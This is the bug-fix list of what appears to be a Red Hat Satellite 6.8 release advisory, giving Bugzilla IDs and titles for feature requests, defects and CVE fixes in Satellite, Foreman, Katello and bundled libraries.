- Bugs fixed (https://bugzilla.redhat.com/):
1160344 - [RFE] Satellite support for cname as alternate cname for satellite server
1261802 - [RFE] Make the foreman bootdisk full-host image work on UEFI systems
1300211 - capsule-certs-generate failed to increment release number when generating certificate rpm for foreman-proxy
1332702 - smart-proxy-openscap-send with additional features - alert if file corrupt
1398317 - For the vms built by Satellite 6 using "Network Based" installation mode on VMWare, unable to change the boot sequence via BIOS
1410616 - [RFE] Prominent notification of expiring subscriptions.
1410916 - Should only be able to add repositories you have access to
1429033 - Host provisioned with RHEL Workstation OS, after provisioning displayed as generic RedHat 7.3
1461781 - [RFE]A button should be available in the GUI to clear the recurring logics.
1469267 - need updated rubygem-rake
1486446 - Content view versions list has slow query for package count
1486696 - 'hammer host update' removes existing host parameters
1494180 - Sorting by network address for subnet doesn't work properly
1501499 - tomcat listens to 0.0.0.0 for serving requests but just needs localhost
1503037 - [RFE] Cancelled future/recurring job invocations should not get the status "failed" but rather "cancelled"
1505842 - Remote Execution engine: Error initializing command: Net::SSH::HostKeyMismatch - fingerprint 20:a9:b7:45:1a:b7:d6:42:1e:03:d1:1f:06:20:4c:e2 does not match for "172.17.0.101"
1531674 - Operating System Templates are ordered inconsistently in UI.
1537320 - [RFE] Support for Capsules at 1 version lower than Satellite
1543316 - Satellite 6.2 Upgrade Fails with error "rake aborted! NoMethodError: undefined method first' for nil:NilClass" when there are custom bookmarks created
1563270 - Sync status information is lost after cleaning up old tasks related to sync.
1569324 - Webrick is unable to use 2 supported TLS v1.2 ciphers ('ECDHE-RSA-AES128-GCM-SHA256', 'ECDHE-RSA-AES256-GCM-SHA384')
1571907 - Passenger threads throwing tracebacks on API jobs after spawning
1576859 - [RFE] Implement automatic assigning subnets through data provided by facter
1584184 - [RFE] The locked template is getting overridden by default
1601101 - [RFE] Add autofill functionality to the Job invocation Search query box, copy from Hosts search box
1607706 - [RFE] Add support for --vlanid in Satellite Kickstart Default provisioning template
1608001 - Rearrange search/filter options on Red Hat Repositories page.
1613391 - race condition on removing multiple organizations simultaneously
1619274 - [RFE] Red Hat Satellite should now be able to discover and provision bare metal machines via UEFI HTTP boot
1619422 - User Agent for Downstream RSS feed still says Foreman and Foreman Version
1620214 - Page should auto-refresh after subscriptions have been modified on the Satellite webui
1624049 - Changing the organization in the Satellite WebUI does not change the sync plan page information from the previous organization
1625258 - Having empty "Allocation (GB)" when creating a new Host, nil:NilClass returned on creating the Host
1627066 - Unable to revert to the original version of the provisioning template
1630433 - [RFE] Include Ansible Satellite modules with Ansible Core modules
1630536 - yum repos password stored as cleartext
1632577 - Audit log show 'missing' for adding/removing repository to a CV
1640615 - CVE-2018-3258 mysql-connector-java: Connector/J unspecified vulnerability (CPU October 2018)
1645062 - host_collection controller responds with 200 instead of 201 to a POST request
1645749 - repositories controller responds with 200 instead of 201 to a POST request
1647216 - Lack of edit_smart_proxies permission causes error when setting host to Build
1647364 - [RFE] Extend the audits by the http request id
1647781 - Audits contain no data (Added foo to Missing(ID: x))
1651297 - Very slow query when using facts on user roles as filters
1653217 - [RFE] More evocative name for Play Ansible Roles option?
1654347 - Satellite may create duplicate CreateRssNotifications tasks after restarting foreman tasks
1654375 - [RFE] Mention specifically uder the admin chexbox for AD LDAP user if its created with admin role,
1659418 - katello-tracer-upload failing with error "ImportError: No module named katello"
1665277 - subscription manager register activation key with special character failed
1665893 - candlepin refuses to start or hangs periodically when having too many messages in ActiveMQ journal
1666693 - Command "hammer subscription list" is not correctly showing the comment "Guests of " in the "Type" field in the output.
1677907 - Ansible API endpoints return 404
1680157 - [RFE] Puppet 'package' provider type does not support selecting modularity streams
1680458 - Locked Report Templates are getting removed.
1680567 - Reporting Engine API to list report template per organization/location returns 404 error
1681619 - [RFE] Disable the option to enter a MAC address after selecting a compute resource while creating new hosts through Satellite
1685949 - [RFE] Support passing of attribute name instead of Id's in RHV workflow
1687116 - kernel version checks should not use /lib/modules to determine running version
1688886 - subscription-manager not attaching the right quantity per the cpu core
1691416 - Delays when many clients upload tracer data simultaneously
1697476 - [RFE] To be able to see the name of the provisioning template being used to build a host from the host itself
1702434 - foreman-bootloaders-redhat-tftpboot expected file permissions in package don't match runtime permissions
1705097 - An empty report file doesn't show any headers
1709557 - [RFE] warn the user if they have done a select all and it includes the restart|reboot service
1709842 - Tracer shows the machines needs rebooting even after reboot if kernel-debug is installed
1710511 - Filter by os_minor includes unexpected values on the Satellite web UI.
1715999 - Use Infoblox API for DNS conflict check and not system resolver
1716423 - Nonexistent quota can be set
1717403 - Broken breadcrumbs link to compute resource VM list on VM detail page
1718012 - [RFE] Add a hard limit of 100 items to restrict any fact child-hash/array
1718954 - [RFE] When the contentAccessMode is set to org_environment for an owner, we should disable auto-attach globally
1719509 - [RFE] "hammer host list" including erratas information
1719516 - [RFE] "hammer host-collection hosts" including erratas information
1720725 - [RFE] Ability to override DHCP options and wait_after_restart option for race condition
1721419 - SSH key cannot be added when FIPS enabled
1722954 - Slow performance when running "hammer host list" with a high number of Content Hosts (15k+ for example)
1723313 - foreman_tasks:cleanup description contain inconsistent information
1724494 - [Capsule][smart_proxy_dynflow_core] "PID file /var/run/foreman-proxy/smart_proxy_dynflow_core.pid not readable (yet?) after start"
1724497 - CVE-2019-12781 Django: Incorrect HTTP detection with reverse-proxy connecting via HTTPS
1726768 - [RFE] Red Hat Satellite 6 GUI, Tasks should show Full name
1729968 - Editing disk size of a Compute Profile for a VMware Compute Resource makes the whole Storage section disappear
1730083 - [RFE] Add Jobs button to host detail page
1731155 - Cloud init template missing snippet compared to Kickstart default user data
1731229 - podman search against Red Hat Satellite 6 fails.
1731235 - [RFE] Create Report Template to list inactive hosts
1733241 - [RFE] hammer does not inherit parent location information
1733650 - Satellite receives RPM1004 pulp error and 403 Forbidden http error retrieving packages from CDN
1736809 - undefined methodsplit' for nil:NilClass when viewing the host info with hammer
1737135 - Content Hosts loses subscriptions after Vmotion and auto attach is unable to assigned the subscriptions if any other subscription is already attached to the host.
1737564 - [RFE] Support custom images on Azure
1738548 - Parameter --openscap-proxy-id is missing in hammer host create command.
1740943 - Increasing Ansible verbosity level does not increase the verbosity of output
1743056 - While creating a host for a particular location, all the domains are in the pull down list, even if only one domain is selected for that location.
1743776 - Error while deleting the content view version.
1745516 - Multiple duplicate index entries are present in candlepin database
1746936 - satellite6 is not using remote execution by default even after setting remote execution by default from satellite web-UI.
1749692 - Default Rhel8 scap content does not get populated on the Satellite
1749916 - [RFE] Satellite should support certificates with > 2048 Key size
1751981 - Parent object properties are not propagated to Child objects in Location and Host Group
1752880 - katello-host-tools-tracer stats paths abusively, leading to a hang or slowness of yum command
1753551 - Traces output from Satellite GUI has mismatches with client tracer output
1756991 - 2 inputs with same name -> uninitialized constant #::NonUniqueInputsError
1757317 - [RFE] Dynflow workers extraction
1757394 - [BUG] Non-admin users always get "Missing one of the required permissions" message while accessing their own table_preferences via Satellite 6 API
1759160 - Rake task for cleaning up DHCP records on proxy
1761872 - Disabled buttons are still working
1763178 - [RFE] Unnecessary call to userhelp and therefore log entries
1763816 - [RFE] Report which users access the API
1766613 - Fact search bar broken and resets to only searching hostname
1766906 - Associating more than 10 Ansible roles to a Host only sets based on the per-page setting
1767497 - Compute Resource filter does not correctly allow Refresh Cache
1767635 - [RFE] Enable Organization and Location to be entered not just selected
1770366 - [RFE] Improve upgrade efficiency by moving RPM post-installation scripts to the installer.
1770544 - Puppet run job notification do not populate "%{puppet_options}"' value
1770777 - Changing concurrency level while executing Ansible jobs fail with NoMethodError: undefined method []' for nil:NilClass
1771367 - undefined methodrequest_uri' when Openidc Provider Token Endpoint is none
1771428 - Openscap documentation link on Satellite 6 webui is broke
1771484 - Client side documentation links are not branded
1771693 - 'Deployed on' parameter is not listed in API output
1772381 - Incorrect example to use multiple attributes as a matcher key in the tooltip for Order
1772517 - login with the user name as same as existing user group gives 500 ISE and wont allow user to login again
1772544 - Use APIv4 is not the default when creating a new compute resource in ovirt
1773298 - GET /katello/api/srpms/compare always fails with error: Missing template katello/api/v2/common/compare
1774710 - UI: When selecting the server type in ldap authentication, "attribute mappings" fields could be populated automatically
1778396 - exporting/importing report template process is causing a different report during the visualization (blank lines)
1778503 - Prepended text on OS name creation
1778681 - Some pages are missing title in html head
1779638 - Unable to filter/search http-proxies using Organization/Location for Satellite UI.
1781671 - While using concurrency_level in remote execution, job progress in WebUI is not being updated properly
1782352 - [RHEL 8.1 client] All packages are not getting updated after click on "Update All Packages"
1782426 - Viewing errata from a repository returns incorrect unfiltered results
1783568 - [RFE] - Bulk Tracer Remediation
1783882 - Ldap refresh failed with "Validation failed: Adding would cause a cycle!"
1784012 - Default kickstart places log to /mnt/sysimage/root/install.post.log
1784341 - disable CertificateRevocationListTask job in candlepin.conf by default
1785117 - [RFE] Add functionality in foreman logging to hash-out or mark as [FILTERED] the password in /var/log/foreman-maintain/foreman-maintain.log and /var/log/foreman-installer/satellite.log file
1785231 - Ansible Variable override to false does not gets reflected on client machine on Red Hat Satellite 6.
1785624 - [UI] Importing templates with associate 'never' is not resulting as expected
1785683 - Does not load datacenter when multiple compute resources are created for same VCenter
1785902 - Ansible RunHostJob tasks failed with "Failed to initialize: NoMethodError - undefined method []' for nil:NilClass"
1785940 - [RFE] Reporting template should allow host filtering based on applicable errata issue date
1787329 - change filename in initrd live CPIO archive to fdi.iso
1788261 - CVE-2018-11751 puppet-agent: Puppet Agent does not properly verify SSL connection when downloading a CRL
1788958 - [RFE] add "elapsed time" column to export and hammer, make it filterable in WebUI
1789006 - Smart proxy dynflow core listens on 0.0.0.0
1789100 - CVE-2019-16782 rubygem-rack: hijack sessions by using timing attacks targeting the session id
1789434 - Template editor not always allows refreshing of the preview pane
1789522 - On unhealthy Satellite, dynflow_envelopes table might grow indefinitely
1789686 - Non-admin user with enough permissions can't generate report of applicable errata
1789815 - The "start" parameter should be mentioned inside "--compute-attributes:" in hammer_cli for Satellite 6
1789911 - "foreman-rake katello:publish_unpublished_repositories" is referring to column which no longer exists in katello_repositories table.
1789924 - [RFE] As user I want to see a "disabled" status for Simple Content Access (Golden Ticketed) Orgs
1791654 - drop config_templates api endpoints and parameters
1791656 - drop deprecated host status endpoint
1791658 - drop reports api endpoint
1791659 - Removeuse_puppet_defaultapi params
1791663 - remove deprecated permissions api parameters
1791665 - drop deprecated compute resource uuid parameter
1792131 - [UI] Could not specify organization/location for users that come from keycloak
1792135 - Not able to login again if session expired from keycloak
1792174 - [RFE] Subscription report template
1792304 - When generating custom report, leave output format field empty
1792378 - [RFE] Long role names are cut off in the roles UI
1793951 - [RFE] Display request UUID on audits page
1794015 - When using boot disk based provisioning, sometimes foreman tries to recreate folder foreman_isos in the datastore even when the folder already exists
1794346 - Change the label for the flashing eye icon during user impersonation
1794641 - Sync status page's content are not being displayed properly.
1795809 - HTML tags visible on paused task page
1796155 - [RFE] host_collections not available in reporting engine unless safe mode disabled
1796205 - iso upload: correctly check if upload directory exists
1796225 - CVE-2020-7238 netty: HTTP Request Smuggling due to Transfer-Encoding whitespace mishandling
1796259 - loading subscriptions page is very slow
1796697 - Unable to list/enable EUS repositories on the RHEL clients registered in the satellite server with org_environment contentAccessMode
1798489 - [RHSSO] - If Access Token Lifespan is set to 5 mins then the user is getting sign out instead after idle SSO timeout
1798668 - Configure default MongoDB WiredTiger cache to be 20% of RAM in the Satellite server
1799480 - CLI - hammer repository info shows blank sync status if the repository sync is in warning/error state.
1800503 - In Hammer, it is not possible to set default keyboard layout for a RHEV host
1801264 - CVE-2020-5217 rubygem-secure_headers: directive injection when using dynamic overrides with user input
1801286 - CVE-2020-5216 rubygem-secure_headers: limited header injection when using dynamic overrides with user input
1802529 - Repository sync in tasks page shows percentage in 17 decimal points
1802631 - Importing Ansible variables yields NoMethodError: undefined methodmap' for nil:NilClass (initialize_variables) [variables_importer.rb]
1803846 - Red Hat Insights Risk Summary shows systems at risk while there are none
1804496 - While performing bulk actions, unable to select all tasks under Monitor --> Tasks page.
1804651 - Missing information about "Create Capsule" via webUI
1805501 - CVE-2020-10693 hibernate-validator: Improper input validation in the interpolation of constraint error messages
1805727 - Default Custom Repository download policy setting refers to old name (Default Repository download policy) in satellite 6.7
1806713 - hypervisor checkin fails with cp_consumer_hypervisor_ukey error
1806842 - Disabling dynflow_enable_console from setting should hide "Dynflow console" in Tasks
1806897 - Red Hat Inventory Uploads fail with NoMethodError: undefined method mtu'
1807042 - [RFE] Support additional disks for VM on Azure Compute Resource
1807321 - A non-admin users with view recurring_logics permissions are unable to list recurring logics.
1807829 - Generated inventory file doesn't exist
1807946 - Multiple duplicate index entries are present in foreman database
1808843 - Satellite lists unrelated RHV storage domains using v4 API
1810250 - Unable to delete repository - Content with ID could not be found
1810549 - dropping packets to qdrouterd triggers a memory leak in qpid-proton 0.28.0-2 libraries used by goferd
1810774 - Applying errata via Host Collection the errata are trying to be applied to all hosts associated with the host collection
1811390 - Links to an errata list of a repository lack repositoryId in URI and points to generic "errata" page instead
1812031 - Improve regenerate applicability tasks performance by querying NEVRA only data from repo_content_units
1812858 - Satellite Inventory Plugin does not appear to make reports which match yupana's API specification
1812904 - 'Hypervisors' task fails with 'undefined method[]' for nil:NilClass' error
1813005 - Prevent --tuning option to be applied in Capsule servers
1813313 - [Tracker] Test HTTP UEFI on IPv6 (QA only tracker)
1814095 - Applicable errata not showing up for module stream errata
1815104 - Locked provisioning template should not be allowed to add audit comment
1815135 - hammer does not support description for custom repositories
1815146 - Backslash escapes when downloading a JSON-formatted report multiple times
1815608 - Content Hosts has Access to Content View from Different Organization
1816330 - CVE-2020-8840 jackson-databind: Lacks certain xbean-reflect/JNDI blocking
1816332 - CVE-2020-9546 jackson-databind: Serialization gadgets in shaded-hikari-config
1816337 - CVE-2020-9547 jackson-databind: Serialization gadgets in ibatis-sqlmap
1816340 - CVE-2020-9548 jackson-databind: Serialization gadgets in anteros-core
1816699 - Satellite Receptor Installer role can miss accounts under certain conditions
1816720 - CVE-2020-7942 puppet: Arbitrary catalog retrieval
1816853 - Report generated by Red Hat Inventory Uploads is empty.
1817215 - Admin must be able to provide all the client ids involved inside Satellite settings.
1817224 - Loading one org's content view when switching to a different org
1817481 - Plugin does not set page
1817728 - Default task polling is too frequent at scale
1817874 - After data upload from satellite UI it is not visible on cloud.redhat.com.
1818062 - Deprecated message about katello agent being shown on content host registration page
1818816 - Web console should open in a new tab/window
1819145 - [RFE] Incorporate apipie-dsl to document template macros, provided as one-time generated HTML document
1819208 - CVE-2020-10968 jackson-databind: Serialization gadgets in org.aoju.bus.proxy.provider..RmiProvider
1819212 - CVE-2020-10969 jackson-databind: Serialization gadgets in javax.swing.JEditorPane
1820193 - Deleted Global Http Proxy is still being used during repository sync.
1820245 - reports in JSON format can't handle unicode characters
1821182 - [Repository] - Packages are not getting synced with rpm-with-sha-512
1821335 - Inventory plugin captures information for systems with any entitlement
1821457 - [RFE] Capsules shouldn't update hosts' "Registered through" facts on the Satellite server in a load-balanced configuration.
1821629 - Eager zero seems to do nothing
1821651 - Manifest import task progress remains at 0.
1821752 - New version of the plugin is available: 1.0.5
1822039 - Get HTTP error when deploying the virt-who configure plugin
1822560 - Unable to sync large openshift docker repos
1823905 - Update distributor version to sat-6.7
1823991 - [RFE] Add a more performant way to sort reports
1824183 - Virtual host get counted as physical hosts on cloud.redhat.com
1824931 - After upgrading to Satellite 6.7 the Tasks page in WebUI goes "Blank"
1825760 - schedule inventory plugin sync failed due to 'organization_id' typecasting issue.
1825930 - [Regression] RedHat Insights client proxying stopped working due to missing proxy
1825978 - Manifest refresh failed with 'Katello::Errors::CandlepinError Invalid credentials.' error
1826298 - even when I cancel ReX job, remediation still shows it as running
1826340 - [RFE] Ability to provision a VM using Red Hat Gold BYOS images
1826515 - [RFE] Consume Candlepin events via STOMP
1826625 - Improve performance of externalNodes
1826678 - New version of the plugin is available: 2.0.6
1826734 - Tasks uses wrong controller name for bookmarks
1826805 - CVE-2020-11619 jackson-databind: Serialization gadgets in org.springframework:spring-aop
1827389 - Manifest import and delete calls Actions::Pulp::Repository::Refresh for non-Library repositories
1827583 - Installing dhcp_isc and dhcp_remote_isc fails with "You cannot specify the same gem twice with different version requirements.....You specified: rsec (< 1) and rsec (>= 0)"
1828257 - Receptor init file missing [Install] section, receptor service won't run after restart
1828486 - CVE-2020-7943 puppet: puppet server and puppetDB may leak sensitive information via metrics API
1828549 - Manifest Certificate Exposed by Unprivileged User
1828682 - Create compute resource shows console error 'Cannot read property 'aDataSort' of undefined'
1828789 - [RFE] Satellite installer should support installing the Satellite Inventory Provider by default
1828868 - Add keep alive option in Receptor node
1829487 - Ansible verbosity level does not work
1829766 - undefined method tr' for nil:NilClass when trying to get a new DHCP lease from infoblox
1830253 - Default job templates are not locked
1830403 - Capsule sync fails when promoting a content view to more than one lifecyle env at the same time
1830834 - Unable to update default value of a smart class parameter (Sql query error).
1830860 - Refactor loading regions based on subscription dynamically
1830882 - Red Hat Satellite brand icon is missing
1830884 - bootstrap.py script tries to yum install puppet package that is not in rhel-7-server-satellite-tools-6.7-rpms repo
1831528 - CVE-2020-5267 rubygem-actionview: views that use thejorescape_javascriptmethods are susceptible to XSS attacks
1833031 - Improve RH account ID fetching in cloud connector playbook
1833035 - Add remediation bulk ack message (i.e. all hosts for a given run has finished)
1833039 - Introduce error code to playbook_run_finished response type
1833311 - "Failed to save: Failed to save when overriding parameters for ansible, cause: Default value is invalid" while creating scap policy with ansible deployment option.
1834302 - --enable-foreman-plugin-rh-cloud fails: Execution of '/bin/yum -d 0 -e 0 -y install tfm-rubygem-foreman_rh_cloud' returned 1: Error: Nothing to do
1834377 - Disable mongo FTDC
1834866 - Missing macro for "registered_at" host subscription facet
1834898 - Login Page background got centralized and cropped
1835189 - Missing macro for "host_redhat_subscriptions" in host subscription facet
1835241 - Some applicability of the consumers are not recalculated after syncing a repository
1835882 - While executing "Configure Cloud Connector" playbook on Satellite 6.7 server it does not honour HTTP Proxy setting
1836155 - Support follow on rails, travis and i18n work for AzureRm plugin
1836771 - In satellite installation summary report, satellite should be mentioned instead of foreman.
1836774 - Some foreman services failed to start (pulp_streamer)
1836845 - "Generate at" in report template should be current date
1837951 - "invalid Unicode Property \p: /\b\perform various actions through those proxies\b(?!-)/" warning messages appears in dynflow-sidekiq@worker-hosts-queue
1838160 - 'Registered hosts' report does not list kernel release for rhsm clients
1838191 - Arrow position is on left rather in the middle under "Start Time"
1838281 - CVE-2020-8161 rubygem-rack: directory traversal in Rack::Directory
1838917 - Repositories are not showing their available Release versions due to a low default db pool size
1838963 - Hypervisors from Satellite, never makes their way to HBI
1838965 - Product name link is not working on the activation keys "Repository Sets" tab.
1839025 - Configure Cloud Connector relies on information which is no longer provided by the API
1839649 - satellite-installer --reset returns a traceback
1839726 - Bring tfm-rubygem-foreman_leapp to downstream builds
1839779 - undefined local variable or methodimplicit_order_column' for # on GET request to /discovery_rules endpoint
1839966 - New version of the plugin is available: 2.0.7
1840166 - ERF42-4995 [Foreman::Exception]: Invalid authenticity token message displayed with traceback, If re-login the machine after session timed-out .
1840191 - Validate parameters passed by receptor to the receptor-satellite plugin
1840218 - ArgumentError: wrong number of arguments
1840525 - Content host list doesn't update after the successful deletion of content host.
1840635 - Proxy has failed to load one or more features (Realm)
1840723 - Selected scenario is DISABLED, can not continue
1840745 - Satellite installation failed with puppet error " No Puppet module parser is installed"
1841098 - Failed to resolve package dependency while doing satellite upgrade.
1841143 - Known hosts key removal may fail hard, preventing host from being provisioned
1841573 - Clicking breadcrumb "Auth Source Ldaps" on Create LDAP Auth Source results in "The page you were looking for doesn't exist."
1841818 - icons missing on /pub download page
1842900 - ERROR! the role 'satellite-receptor' was not found in ...
1842943 - ~foreman-proxy/.ssh is a symlink to /usr/com/foreman-proxy/ssh/
1843406 - In 6.8, Receptor installation playbook's inputs are visible again
1843561 - Report templates duplicated
1843846 - Host - Registered Content Hosts report: "Safemode doesn't allow to access 'report_hraders' on #"
1843867 - Satellite-installer failed with argument error while upgrading the satellite from 6.7 to 6.8
1843926 - satellite-change-hostname fails when running nsupdate
1844142 - [RFE] Drop a subsription-manager fact with the satellite version
1845112 - Installer deploys outdated version of pxegrub2 mac template to TFTP
1845486 - [RFE] Able to select 'HTTP Proxy' during Compute Resource create for 'GCE' as similar to EC2
1845860 - hammer org add-provisioning-template command returns Error: undefined method []' for nil:NilClass
1845978 - CVE-2020-7663 rubygem-websocket-extensions: ReDoS vulnerability in Sec-WebSocket-Extensions parser
1846254 - need to restart services after enabling leapp plugin
1846313 - Add index on locks for resource type and task id
1846317 - undefined methodklass' for nil:NilClass
1846421 - build pxe default do not work when more than 1 provider
1846593 - Satellite-installer failed with error "Could not find a suitable provider for foreman_smartproxy" while doing upgrade from 6.7 to 6.8
1847019 - Empty applicability for non-modular repos
1847063 - Slow manifest import and/or refresh
1847407 - load_pools macro not in list of macros
1847645 - Allow override of Katello's DISTRIBUTOR_VERSION
1847784 - Error updating system data on the server, see /var/log/rhsm/rhsm.log for more details.
1847840 - Libvirt note link leads to 404
1847871 - Combined Profile Update: ArgumentError: invalid argument: nil.
1848291 - Download kernel/initram for kexec asynchronously
1848535 - Unable to create a pure IPv6 host
1848538 - Failed to resolve the packages due to tfm-runtime package dependency in fm-upgrade(6.7 to 6.8)
1848902 - ERF42-0258 [Foreman::Exception]: is not valid, enter id or name
1848958 - CVE-2020-14195 jackson-databind: serialization in org.jsecurity.realm.jndi.JndiRealmFactory
1848962 - CVE-2020-14062 jackson-databind: serialization in com.sun.org.apache.xalan.internal.lib.sql.JNDIConnectionPool
1848966 - CVE-2020-14061 jackson-databind: serialization in weblogic/oracle-aqjms
1848973 - capsule-certs-generate suggests running foreman-installer --scenario foreman-proxy-content instead of satellite-installer --scenario capsule
1849141 - CVE-2020-8184 rubygem-rack: percent-encoded cookies can be used to overwrite existing prefixed cookie names
1849656 - ERROR! You cannot use loops on 'import_tasks' statements. You should use 'include_tasks' instead.
1849680 - Task progress decimal precision discrepancy between UI, CLI, and API
1849869 - Unable to recycle the dynflow executor
1850355 - Auth Source Role Filters are not working in Satellite 6.8
1850536 - Can't add RHEV with APIv3 through Hammer
1850914 - Checksum type "sha256" is not available for all units in the repository. Make sure those units have been downloaded
1850934 - Satellite-installer failed with error "Could not evaluate: Proxy xyz..com cannot be retrieved: unknown error (response 502)"
1851017 - Position of text cursor in ace-editor wrong and hence unable to edit templates
1851030 - [RFE] Upgrade Ansible used from RHEL to be 2.9
1851167 - Autoattach -> "undefined" subscription added
1851176 - Subscriptions do not provide any repository sets
1851952 - "candlepin_events FAIL Not running" and wont restart
1852371 - Allow http proxy ports by default
1852723 - Broken link for documentation on installation media page
1852733 - Inventory upload documentation redirects to default location
1852735 - New version of the plugin is available: 2.0.8
1853076 - large capsule syncs cause slow processing of dynflow tasks/steps
1853200 - foreman-rake-db:migrate Fails on "No indexes found on foreman_tasks_locks with the options provided"
1853280 - Content view filter is excluding modules and Packages when published after upgrading the Satellite from 6.6 to 6.7
1853463 - Plugin does not upload inventory - Permission denied /var/lib/foreman/red_hat_inventory/uploads/uploader.sh
1853504 - [Regression] Hammer export-legacy Fails with Composite Content Views
1853572 - Broken documentation link for 'RHV' in Compute Resource
1854138 - System purpose status should show as 'disabled' when Satellite is in Simple Content Access mode.
1854397 - Compliance reports are not being uploaded to satellite.
1854530 - PG::NotNullViolation when syncing hosts from cloud
1855008 - Host parameters are set after the host is created.
1855254 - Links to documentation broken in HTTP Proxies setup
1855348 - katello_applicability accidentally set to true at install
1855710 - 'Ensure RPM repository is configured and enabled' task says 'FIXME'
1856370 - Clicking on any other tab other than overview while on capsule synchronizing page, redirects to overview page.
1856379 - Add missing VM creation tests
1856401 - [RFE] Add module to create HTTP Proxy
1856831 - New version of the plugin is available: 2.0.9
1856837 - undefined method '#httpboot' for NilClass::Jail (NilClass) when creating an IPv6 only host
1857124 - Attempting to attach a subscription to an unregistered host results in ISE 500
1857146 - Unable to build a host bootdisk image due to missing dosfstools package - Failed to format the ESP image via mkfs.msdos
1857184 - selinux is preventing to build a bootdisk iso - Failed to format the ESP image via mkfs.msdos
1857377 - Capsule Upgrade Playbook fails with "Failed to initialize: NoMethodError - undefined method default_capsule' for Katello:Module"
1857506 - Capsule Upgrade Fail: satellite-installer --scenario capsule --upgrade throws NameError
1857572 - tailoring-file and scap-content command of hammer downloads file with wrong filename.
1857726 - Warnings are shown during the satellite package installation on RHEL 7.9
1858237 - Upgraded Satellite has duplicated katello_pools indexes
1858284 - CVE-2020-14334 foreman: unauthorized cache read on RPM-based installations through local user
1858819 - katello-certs-check output print foreman-installer--scenario katello instead satellite-installer --scenario satellite
1858855 - Creating compute resources on IPV6 network does not fail gracefully
1859158 - Unknown HTTPBoot EFI hosts are not directed to the grubx64.efi with a default grub conf
1859194 - load_hosts macro duplicated in a list of macros
1859276 - Need to update the deprecation warning message on Statistics and Trends page.
1859705 - Tomcat is not running on fresh Capsule installation
1859929 - User can perform other manifest actions while the first one starts
1860351 - 'Host - compare content hosts packages' report fails with error 'undefined method '#first' for NilClass'
1860407 - remote job-status table should not be re-loaded every second even if a job is running or completed
1860422 - Host with remediations can't be removed
1860430 - 'Host - compare content hosts packages' report: Safemode doesn't allow to access 'version'...
1860444 - After the system reboot, capsule setup(upgraded or newly installed 6.8 capsule) fails to start the tomcat service
1860519 - Browsing capsule /pub directory with https fails with forbidden don't have permission to access /pub/ error.
1860585 - Content Host Registration page showing version 6.7 for repos instead 6.8
1860587 - Documentation link in Administer -> About pointing to 6.6 document.
1860835 - Installed Packages not displayed on About page
1860957 - Unable to select an organization for sync management
1861367 - Import Template sync never completes
1861397 - UI dialog for Capsule Upgrade Playbook job doesn't state whitelist_options is required
1861422 - Error encountered while handling the response, replying with an error message ('plugin_config')
1861656 - smart-proxy-openscap-send command fails to upload reports to satellite.
1861724 - ipv6: host form in interfaces are showing Error generating IP: Bad Request
1861766 - Add ability to list traces by host with hammer
1861807 - Cancel/Abort button should be disabled once REX job is finish
1861816 - Error only on production builds: The Dynflow world was not initialized yet. If your plugin uses it, make sure to call Rails.application.dynflow.require! in some initializer
1861831 - satellite-change-hostname cannot change the satellite hostname after failing.
1861890 - Recommended repos do not match Satellite version
1861970 - Content -> Product doesn't work when no organization is selected
1862135 - updating hosts policy using bulk action fails with sql error
1862445 - compliance policy creation fails for ansible deployment option on upgraded satellite.
1862772 - Default repositories are not enabled, after registering a client with an Activation Key, to an org with Simple Content Access Mode in Red Hat Satellite 6
1865871 - Obfuscated hosts do not have domain reported
1865872 - Templates doc - examples on onepage.html are not processed
1865874 - Add inventory status to host
1865876 - Make recommendations count in hosts index a link
1865879 - Add automatic scheduler for insights sync
1865880 - Add an explanation how to enable insights sync
1865928 - Templates documentation help page has hard-coded Satellite setting value
1865943 - dynflow-sidekiq results in messages logs getting filled up more frequently
1866029 - Templates DSL documentation: Parts of description are put in <pre> tag
1866436 - host search filter does not work in job invocation page
1866461 - Run action is missing in job templates page
1866515 - ForemanVirtWhoConfigure::AuthSourceHiddenWithAuthentication is displayed on auth sources page
1866700 - Hammer CLI is missing "resolve" (traces) option for katello-tracer
1866710 - Wrong API endpoint path referenced for resolving host traces
1867239 - hammer content-view version incremental-update fails with ISE
1867287 - Error Row was updated or deleted by another transaction when deleting docker repository
1867311 - Upgrade fails when checkpoint_segments postgres parameter configured
1867399 - Receptor-satellite isn't able to deal with jobs where all the hosts are unknown to satellite
1867895 - API Create vmware ComputeResource fails with "Datacenter can't be blank"
1868183 - Unable to change virt-who hypervisor location.
1868971 - Receptor installation job doesn't properly escape data it puts into receptor.conf
1869640 - client-dispatcher: wrong number of arguments (given 0, expected 1..3) (ArgumentError)' messages come in upgrade and installation.
1869812 - Tasks fail to complete under load
1870657 - Make rake console run as a dynflow client to allow access to features provided by dynflow
1871016 - managercli.py:1364 - Error: Unable to retrieve service levels: HTTP error (404 - Not Found)
1871434 - theme css ".container" class rule is too generic
1871729 - ansible-runner implementation depends on third party repository for ansible-runner package.
1871815 - Satellite Ansible Collection - Provisioning a host fails with timeout
1871978 - Bug in provisioning_template Module
1872014 - Enable web console on host error in "Oops, we're sorry but something went wrong ERF42-5962 [Foreman::Exception]: No template mapped to feature Enable web console"
1872041 - Host search returns incorrect result
1873408 - Updating the CDN URL is manifest works fine but creates some tasks which remains in planned state with success result
1873926 - CVE-2020-14380 Satellite: Local user impersonation by Single sign-on (SSO) user leads to account takeover
1874143 - Red Hat Inventory Uploads does not use proxy
1874160 - Changing Content View of a Content Host needs to better inform the user around client needs
1874168 - Sync Plan fails with 'uninitialized constant Actions::Foreman::Exception'
1874171 - [RFE] Allow Subscription-manager service plugin for zypper (SLES) to set autorefresh in repo file
1874172 - [6.7] Unable to re-import subscriptions in large environment (60k+ content hosts)
1874175 - After upgrading to 6.7 and promoting content, Capsule sync is extremely slow
1874176 - Unable to search by value of certain Hostgroup parameter
1874422 - Hits Sync uses only old proxy setting
1874619 - Hostgroup tag is never reported in slice
1875357 - After upgrade server response check failed for candlepin.
1875426 - Azure VM provision fails with errorrequests.exceptions.HTTPError: 502 Server Error: Proxy Error for url`
1875660 - Reporting Template macros host_cores is not working as expected
1875667 - Audit page list incorrect search filter
1877307 - [Authentication] External auth login using Kerberos SSO is failing for AD and IDM on Satellite 6.8 only
1877354 - [Sat6/Bug] RHEL8 systems generate false positive warnings about repo binding
1877443 - Post Satellite 6.8 Upgrade AD authentication via LDAP fails when using an A record which returns 42 entries
1877452 - content set mappings for satellite-tools-6.8-for-rhel-8 AUS repos are missing from cdn/cs_mappings-.csv
1877520 - content set mappings for satellite-tools-6.8-for-rhel-8 EUS repos are missing from cdn/cs_mappings-.csv
1877542 - content set mappings for rhel7 satellite-tools-6.8 EUS repos are missing from cdn/cs_mappings-.csv
